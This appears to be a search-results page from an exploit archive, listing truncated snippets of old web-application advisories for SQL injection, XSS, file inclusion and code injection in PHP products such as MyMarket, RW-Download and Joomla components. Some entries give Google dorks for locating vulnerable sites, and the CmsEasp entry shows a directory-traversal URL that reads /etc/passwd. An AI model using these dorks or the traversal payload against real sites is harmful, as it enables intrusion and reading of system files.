7210 matches found
MyMarket 1.71 SQL Injection
Exploit Title: MyMarket version 1.71 index.php SQL Injection Google Dork: allinurl:mymarket/shopping/index.php Date: 7-2-2011 Author: ahmadso Version: 1.71 Tested on: win xp sp2 ==================================================== http://www.site.com/mymarket/shopping/index.php?id= SQL Codes...
MyMarket 1.71 - index.php SQL Injection
MyMarket 1.71 - index.php SQL Injection Exploit Title: MyMarket version 1.71 index.php SQL Injection Google Dork: allinurl:mymarket/shopping/index.php Date: 7-2-2011 Author: ahmadso Version: 1.71 Tested on: win xp sp2 ====================================================...
Dew-NewPHPLinks 2.1b - 'index.php' SQL Injection
Dew-NewPHPLinks v.2.1b index.php Sql Injection Vulnerability ====================================================================== .:. Author : AtT4CKxT3rR0r1ST [email protected] .:. Script : http://www.dew-code.com/ .:. Dork : "Powered By Dew-NewPHPLinks v.2.1b" .:. Special Gr34T$ T0 ZaIdOoHxHaCkEr =...
Dew-NewPHPLinks 2.1b - index.php SQL Injection
Dew-NewPHPLinks 2.1b - index.php SQL Injection Dew-NewPHPLinks v.2.1b index.php Sql Injection Vulnerability ====================================================================== .:. Author : AtT4CKxT3rR0r1ST [email protected] .:. Script : http://www.dew-code.com/ .:. Dork : "Powered By Dew-NewPHPLinks...
CVE-2010-4718
Multiple cross-site scripting (XSS) vulnerabilities in the Lyftenbloggie (com_lyftenbloggie) component 1.1.0 for Joomla! allow remote attackers to inject arbitrary web script or HTML via the (1) tag and (2) category parameters to index.php...
TinyWebGallery 1.8.3 Cross Site Scripting / Directory Traversal
Date: 01/02/2011 dd/MM/yyyy Script: TinyWebGallery Version: 1.8.3 No fixes yet, might work on other versions too. Home: http://www.tinywebgallery.com -- Vulnerability: Non-persistent XSS Where: File: /admin/index.php Parameters: sview, tview, dir, item. Examples:...
RW-Download 4.0.6 - index.php SQL Injection
RW-Download 4.0.6 - index.php SQL Injection /////////////////////////Dr.NeT/////////////////////////////////Dr.NeT//////////////////////Dr.NeT////////// //Title ||= RW-Download v4.0.6 = index.php SQL Injection Vulnerability // //Secript ||= RW-Download // //Language||= Php // //Download||=...
RW-Download 4.0.6 - 'index.php' SQL Injection
/////////////////////////Dr.NeT/////////////////////////////////Dr.NeT//////////////////////Dr.NeT////////// //Title ||= RW-Download v4.0.6 = index.php SQL Injection Vulnerability // //Secript ||= RW-Download // //Language||= Php // //Download||=...
MultiCMS Local File Inclusion
=============================wwwdotWhiteponnydotcom============================= Date: 29/01/2011 Author: R3VANBASTARD Exploit Title: MultiCMS File Inclusion Vulnerability Vendor: http://www.multicms.net Status: FIXED Tested on: Windows 7 Dork: "Redakcní systém MultiCMS" Mail:...
Code injection
Static code injection vulnerability in Simploo CMS 1.7.1 and earlier allows remote authenticated users to inject arbitrary PHP code into config/custom/base.ini.php via the ftpserver parameter (FTP-Server field) to the sicore/updates/optionssav operation for index.php...
CVE-2011-0635
Static code injection vulnerability in Simploo CMS 1.7.1 and earlier allows remote authenticated users to inject arbitrary PHP code into config/custom/base.ini.php via the ftpserver parameter (FTP-Server field) to the sicore/updates/optionssav operation for index.php...
CVE-2011-0635
CVE-2011-0635 affects Simploo CMS 1.7.1 and earlier. The vulnerability is a static code injection flaw where remote authenticated users can inject arbitrary PHP into config/custom/base.ini.php via the ftpserver parameter (FTP-Server field) to the sicore/updates/optionssav operation of index.php. ...
Multiple Vulnerabilities in ReOS
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in ReOS which could be exploited to perform SQL injection attacks and compromise vulnerable system. 1 SQL injection vulnerabilities in ReOS 1.1 The vulnerability exists due to input sanitation errors in the...
CmsEasp 2.0.0 LFI vulnerability
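The Yitong (易通) Enterprise Website System, also known as the Yitong Enterprise Website Program, is a marketing-oriented enterprise website management system developed by the Yitong company, and the first in China to provide enterprise website templates free of charge. Its front end generates HTML and is fully SEO-compliant, and it also offers online customer service, prospective-customer tracking, convenient enterprise website template creation, search engine promotion and other features. CmsEasp 2.0.0 null http://server/index.php?case=../../../../../../../../../../../../../../../../etc/passwd%00...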
Sql injection
Multiple SQL injection vulnerabilities in Joomla! 1.5.x before 1.5.22 allow remote attackers to execute arbitrary SQL commands via the (1) filter_order or (2) filter_order_Dir parameter in a com_contact action to index.php, a different vulnerability than CVE-2010-4166. NOTE: the provenance of this...
Joomla! Component com_people 1.0.0 - Local File Inclusion
Author : altbta [email protected] Home : xp10.com Script : Joomla Component com_people Bug Type : Local File Inclusion Vulnerability Dork : inurl:"/index.php?option=com_people" Vendor : http://www.ptt-solution.com === Exploit === LFI...
LifeType 1.2.10 HTTP Referer stored XSS
Exploit for php platform in category web applications Exploit Title: lifetype 1.2.10 http referer XSS Date: 11-1-2010 Author: Saif El-Sherei Software Link: http://lifetype.net/page/downloads Version: 1.2.10 Tested on: firefox 3.0.15 failure to sanitize the http referer header in index.php results...
PT-2011-2346 · Tinybb · Tinybb
Name of the Vulnerable Software and Affected Versions: tinyBB version 1.2 Description: The issue allows remote attackers to execute arbitrary SQL commands when magic_quotes_gpc is disabled. This can be achieved via the id parameter in a profile action to "index.php". Recommendations: For tinyBB...
CVE-2011-0005
Cross-site scripting (XSS) vulnerability in the com_search module for Joomla! 1.0.x through 1.0.15 allows remote attackers to inject arbitrary web script or HTML via the ordering parameter to index.php...
Elxis CMS 2009.2 Remote file include vulnerability
Exploit for php platform in category web applications elxis2009.2electrarev2631 installation folder.'; include$mosConfigabsolutepath.'/includes/systemplates/router.php'; exit; requireonce$mosConfigabsolutepath.'/includes/Core/loader.php'; file : index2.php...